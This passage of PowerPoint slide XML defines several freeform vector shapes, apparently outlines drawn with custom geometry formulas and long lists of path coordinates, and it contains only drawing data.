                    <a:lnTo>
                      <a:pt x="58" y="260"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="262"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="264"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="00CC00"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36298" name="Freeform 30"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4814" y="2221"/>
                <a:ext cx="178" cy="162"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 104 w 178"/>
                  <a:gd name="T1" fmla="*/ 82 h 162"/>
                  <a:gd name="T2" fmla="*/ 99 w 178"/>
                  <a:gd name="T3" fmla="*/ 90 h 162"/>
                  <a:gd name="T4" fmla="*/ 102 w 178"/>
                  <a:gd name="T5" fmla="*/ 98 h 162"/>
                  <a:gd name="T6" fmla="*/ 108 w 178"/>
                  <a:gd name="T7" fmla="*/ 93 h 162"/>
                  <a:gd name="T8" fmla="*/ 126 w 178"/>
                  <a:gd name="T9" fmla="*/ 82 h 162"/>
                  <a:gd name="T10" fmla="*/ 136 w 178"/>
                  <a:gd name="T11" fmla="*/ 70 h 162"/>
                  <a:gd name="T12" fmla="*/ 143 w 178"/>
                  <a:gd name="T13" fmla="*/ 57 h 162"/>
                  <a:gd name="T14" fmla="*/ 146 w 178"/>
                  <a:gd name="T15" fmla="*/ 47 h 162"/>
                  <a:gd name="T16" fmla="*/ 144 w 178"/>
                  <a:gd name="T17" fmla="*/ 35 h 162"/>
                  <a:gd name="T18" fmla="*/ 146 w 178"/>
                  <a:gd name="T19" fmla="*/ 28 h 162"/>
                  <a:gd name="T20" fmla="*/ 150 w 178"/>
                  <a:gd name="T21" fmla="*/ 13 h 162"/>
                  <a:gd name="T22" fmla="*/ 156 w 178"/>
                  <a:gd name="T23" fmla="*/ 13 h 162"/>
                  <a:gd name="T24" fmla="*/ 165 w 178"/>
                  <a:gd name="T25" fmla="*/ 12 h 162"/>
                  <a:gd name="T26" fmla="*/ 159 w 178"/>
                  <a:gd name="T27" fmla="*/ 4 h 162"/>
                  <a:gd name="T28" fmla="*/ 169 w 178"/>
                  <a:gd name="T29" fmla="*/ 4 h 162"/>
                  <a:gd name="T30" fmla="*/ 170 w 178"/>
                  <a:gd name="T31" fmla="*/ 20 h 162"/>
                  <a:gd name="T32" fmla="*/ 178 w 178"/>
                  <a:gd name="T33" fmla="*/ 37 h 162"/>
                  <a:gd name="T34" fmla="*/ 171 w 178"/>
                  <a:gd name="T35" fmla="*/ 55 h 162"/>
                  <a:gd name="T36" fmla="*/ 169 w 178"/>
                  <a:gd name="T37" fmla="*/ 63 h 162"/>
                  <a:gd name="T38" fmla="*/ 162 w 178"/>
                  <a:gd name="T39" fmla="*/ 69 h 162"/>
                  <a:gd name="T40" fmla="*/ 161 w 178"/>
                  <a:gd name="T41" fmla="*/ 79 h 162"/>
                  <a:gd name="T42" fmla="*/ 157 w 178"/>
                  <a:gd name="T43" fmla="*/ 99 h 162"/>
                  <a:gd name="T44" fmla="*/ 157 w 178"/>
                  <a:gd name="T45" fmla="*/ 114 h 162"/>
                  <a:gd name="T46" fmla="*/ 154 w 178"/>
                  <a:gd name="T47" fmla="*/ 121 h 162"/>
                  <a:gd name="T48" fmla="*/ 144 w 178"/>
                  <a:gd name="T49" fmla="*/ 133 h 162"/>
                  <a:gd name="T50" fmla="*/ 147 w 178"/>
                  <a:gd name="T51" fmla="*/ 121 h 162"/>
                  <a:gd name="T52" fmla="*/ 137 w 178"/>
                  <a:gd name="T53" fmla="*/ 127 h 162"/>
                  <a:gd name="T54" fmla="*/ 131 w 178"/>
                  <a:gd name="T55" fmla="*/ 136 h 162"/>
                  <a:gd name="T56" fmla="*/ 127 w 178"/>
                  <a:gd name="T57" fmla="*/ 137 h 162"/>
                  <a:gd name="T58" fmla="*/ 124 w 178"/>
                  <a:gd name="T59" fmla="*/ 131 h 162"/>
                  <a:gd name="T60" fmla="*/ 117 w 178"/>
                  <a:gd name="T61" fmla="*/ 139 h 162"/>
                  <a:gd name="T62" fmla="*/ 103 w 178"/>
                  <a:gd name="T63" fmla="*/ 140 h 162"/>
                  <a:gd name="T64" fmla="*/ 93 w 178"/>
                  <a:gd name="T65" fmla="*/ 135 h 162"/>
                  <a:gd name="T66" fmla="*/ 91 w 178"/>
                  <a:gd name="T67" fmla="*/ 140 h 162"/>
                  <a:gd name="T68" fmla="*/ 95 w 178"/>
                  <a:gd name="T69" fmla="*/ 146 h 162"/>
                  <a:gd name="T70" fmla="*/ 83 w 178"/>
                  <a:gd name="T71" fmla="*/ 155 h 162"/>
                  <a:gd name="T72" fmla="*/ 70 w 178"/>
                  <a:gd name="T73" fmla="*/ 157 h 162"/>
                  <a:gd name="T74" fmla="*/ 67 w 178"/>
                  <a:gd name="T75" fmla="*/ 147 h 162"/>
                  <a:gd name="T76" fmla="*/ 72 w 178"/>
                  <a:gd name="T77" fmla="*/ 140 h 162"/>
                  <a:gd name="T78" fmla="*/ 66 w 178"/>
                  <a:gd name="T79" fmla="*/ 139 h 162"/>
                  <a:gd name="T80" fmla="*/ 55 w 178"/>
                  <a:gd name="T81" fmla="*/ 138 h 162"/>
                  <a:gd name="T82" fmla="*/ 47 w 178"/>
                  <a:gd name="T83" fmla="*/ 141 h 162"/>
                  <a:gd name="T84" fmla="*/ 27 w 178"/>
                  <a:gd name="T85" fmla="*/ 147 h 162"/>
                  <a:gd name="T86" fmla="*/ 19 w 178"/>
                  <a:gd name="T87" fmla="*/ 148 h 162"/>
                  <a:gd name="T88" fmla="*/ 10 w 178"/>
                  <a:gd name="T89" fmla="*/ 151 h 162"/>
                  <a:gd name="T90" fmla="*/ 1 w 178"/>
                  <a:gd name="T91" fmla="*/ 147 h 162"/>
                  <a:gd name="T92" fmla="*/ 9 w 178"/>
                  <a:gd name="T93" fmla="*/ 144 h 162"/>
                  <a:gd name="T94" fmla="*/ 32 w 178"/>
                  <a:gd name="T95" fmla="*/ 123 h 162"/>
                  <a:gd name="T96" fmla="*/ 39 w 178"/>
                  <a:gd name="T97" fmla="*/ 124 h 162"/>
                  <a:gd name="T98" fmla="*/ 63 w 178"/>
                  <a:gd name="T99" fmla="*/ 120 h 162"/>
                  <a:gd name="T100" fmla="*/ 73 w 178"/>
                  <a:gd name="T101" fmla="*/ 124 h 162"/>
                  <a:gd name="T102" fmla="*/ 82 w 178"/>
                  <a:gd name="T103" fmla="*/ 118 h 162"/>
                  <a:gd name="T104" fmla="*/ 86 w 178"/>
                  <a:gd name="T105" fmla="*/ 107 h 162"/>
                  <a:gd name="T106" fmla="*/ 93 w 178"/>
                  <a:gd name="T107" fmla="*/ 88 h 162"/>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178"/>
                  <a:gd name="T163" fmla="*/ 0 h 162"/>
                  <a:gd name="T164" fmla="*/ 178 w 178"/>
                  <a:gd name="T165" fmla="*/ 162 h 162"/>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178" h="162">
                    <a:moveTo>
                      <a:pt x="95" y="86"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="96" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="138" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="139" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="143" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="146" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="143" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="146" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="154" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="165" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="164" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="161" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="164" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="167" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="169" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="169" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="169" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="170" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="171" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="176" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="171" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="170" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="170" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="169" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="164" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="162" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="160" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="160" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="161" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="162" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="162" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="155" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="155" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="160" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="155" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="154" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="143" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="129" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="122" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="144"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="155"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="159"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="155"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="154"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="143"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="144"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="144"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="144"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="145"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="145"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="144"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="86"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36299" name="Freeform 31"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4956" y="2134"/>
                <a:ext cx="91" cy="91"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 5 w 91"/>
                  <a:gd name="T1" fmla="*/ 88 h 91"/>
                  <a:gd name="T2" fmla="*/ 7 w 91"/>
                  <a:gd name="T3" fmla="*/ 80 h 91"/>
                  <a:gd name="T4" fmla="*/ 2 w 91"/>
                  <a:gd name="T5" fmla="*/ 75 h 91"/>
                  <a:gd name="T6" fmla="*/ 0 w 91"/>
                  <a:gd name="T7" fmla="*/ 65 h 91"/>
                  <a:gd name="T8" fmla="*/ 8 w 91"/>
                  <a:gd name="T9" fmla="*/ 60 h 91"/>
                  <a:gd name="T10" fmla="*/ 13 w 91"/>
                  <a:gd name="T11" fmla="*/ 53 h 91"/>
                  <a:gd name="T12" fmla="*/ 12 w 91"/>
                  <a:gd name="T13" fmla="*/ 47 h 91"/>
                  <a:gd name="T14" fmla="*/ 19 w 91"/>
                  <a:gd name="T15" fmla="*/ 51 h 91"/>
                  <a:gd name="T16" fmla="*/ 25 w 91"/>
                  <a:gd name="T17" fmla="*/ 50 h 91"/>
                  <a:gd name="T18" fmla="*/ 28 w 91"/>
                  <a:gd name="T19" fmla="*/ 36 h 91"/>
                  <a:gd name="T20" fmla="*/ 32 w 91"/>
                  <a:gd name="T21" fmla="*/ 27 h 91"/>
                  <a:gd name="T22" fmla="*/ 29 w 91"/>
                  <a:gd name="T23" fmla="*/ 10 h 91"/>
                  <a:gd name="T24" fmla="*/ 30 w 91"/>
                  <a:gd name="T25" fmla="*/ 3 h 91"/>
                  <a:gd name="T26" fmla="*/ 35 w 91"/>
                  <a:gd name="T27" fmla="*/ 1 h 91"/>
                  <a:gd name="T28" fmla="*/ 45 w 91"/>
                  <a:gd name="T29" fmla="*/ 13 h 91"/>
                  <a:gd name="T30" fmla="*/ 60 w 91"/>
                  <a:gd name="T31" fmla="*/ 29 h 91"/>
                  <a:gd name="T32" fmla="*/ 68 w 91"/>
                  <a:gd name="T33" fmla="*/ 33 h 91"/>
                  <a:gd name="T34" fmla="*/ 78 w 91"/>
                  <a:gd name="T35" fmla="*/ 35 h 91"/>
                  <a:gd name="T36" fmla="*/ 86 w 91"/>
                  <a:gd name="T37" fmla="*/ 28 h 91"/>
                  <a:gd name="T38" fmla="*/ 89 w 91"/>
                  <a:gd name="T39" fmla="*/ 28 h 91"/>
                  <a:gd name="T40" fmla="*/ 85 w 91"/>
                  <a:gd name="T41" fmla="*/ 37 h 91"/>
                  <a:gd name="T42" fmla="*/ 89 w 91"/>
                  <a:gd name="T43" fmla="*/ 47 h 91"/>
                  <a:gd name="T44" fmla="*/ 87 w 91"/>
                  <a:gd name="T45" fmla="*/ 53 h 91"/>
                  <a:gd name="T46" fmla="*/ 80 w 91"/>
                  <a:gd name="T47" fmla="*/ 57 h 91"/>
                  <a:gd name="T48" fmla="*/ 74 w 91"/>
                  <a:gd name="T49" fmla="*/ 55 h 91"/>
                  <a:gd name="T50" fmla="*/ 68 w 91"/>
                  <a:gd name="T51" fmla="*/ 56 h 91"/>
                  <a:gd name="T52" fmla="*/ 60 w 91"/>
                  <a:gd name="T53" fmla="*/ 66 h 91"/>
                  <a:gd name="T54" fmla="*/ 55 w 91"/>
                  <a:gd name="T55" fmla="*/ 77 h 91"/>
                  <a:gd name="T56" fmla="*/ 50 w 91"/>
                  <a:gd name="T57" fmla="*/ 74 h 91"/>
                  <a:gd name="T58" fmla="*/ 32 w 91"/>
                  <a:gd name="T59" fmla="*/ 64 h 91"/>
                  <a:gd name="T60" fmla="*/ 19 w 91"/>
                  <a:gd name="T61" fmla="*/ 70 h 91"/>
                  <a:gd name="T62" fmla="*/ 16 w 91"/>
                  <a:gd name="T63" fmla="*/ 64 h 91"/>
                  <a:gd name="T64" fmla="*/ 11 w 91"/>
                  <a:gd name="T65" fmla="*/ 65 h 91"/>
                  <a:gd name="T66" fmla="*/ 8 w 91"/>
                  <a:gd name="T67" fmla="*/ 70 h 91"/>
                  <a:gd name="T68" fmla="*/ 21 w 91"/>
                  <a:gd name="T69" fmla="*/ 78 h 91"/>
                  <a:gd name="T70" fmla="*/ 20 w 91"/>
                  <a:gd name="T71" fmla="*/ 83 h 91"/>
                  <a:gd name="T72" fmla="*/ 16 w 91"/>
                  <a:gd name="T73" fmla="*/ 82 h 91"/>
                  <a:gd name="T74" fmla="*/ 12 w 91"/>
                  <a:gd name="T75" fmla="*/ 85 h 91"/>
                  <a:gd name="T76" fmla="*/ 6 w 91"/>
                  <a:gd name="T77" fmla="*/ 91 h 91"/>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91"/>
                  <a:gd name="T118" fmla="*/ 0 h 91"/>
                  <a:gd name="T119" fmla="*/ 91 w 91"/>
                  <a:gd name="T120" fmla="*/ 91 h 91"/>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91" h="91">
                    <a:moveTo>
                      <a:pt x="6" y="91"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="5" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="55"/>
                    </a:lnTo>
